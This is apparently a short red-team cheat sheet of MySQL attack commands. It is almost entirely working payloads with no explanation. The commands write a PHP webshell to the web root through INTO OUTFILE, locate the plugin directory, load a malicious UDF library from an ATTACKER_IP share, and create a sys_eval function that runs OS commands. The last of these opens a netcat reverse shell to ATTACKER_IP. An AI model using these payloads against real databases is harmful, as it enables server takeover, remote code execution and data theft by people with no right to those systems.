-- Check
SHOW VARIABLES LIKE "secure_file_priv";
-- Write a PHP webshell via OUTFILE (SQLi → RCE)
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';
-- Identify plugin directory (required for UDF exploitation)
SHOW VARIABLES LIKE 'plugin_dir';
SHOW PLUGINS;
UNION SELECT NULL, NULL, NULL, variable_value
FROM information_schema.global_variables
WHERE variable_name = 'plugin_dir'
-- UDF: load a malicious DLL/SO into plugin directory
-- Windows example:
SELECT LOAD_FILE('\\\\ATTACKER_IP\\share\\lib_mysqludf_sys_64.dll')
INTO DUMPFILE 'C:/xampp/mysql/lib/plugin/udf.dll';
-- Linux example: (lib_mysqludf_sys.so)
SELECT LOAD_FILE('/tmp/udf.so') INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
-- Create malicious UDF function
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'; -- Windows
-- or
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; -- Linux
-- Execute OS commands
SELECT sys_eval('whoami');
SELECT sys_eval('id');
SELECT sys_eval("nc -e /bin/sh ATTACKER_IP 4444");
RED TEAM / SQL / MYSQL / ENUMERATION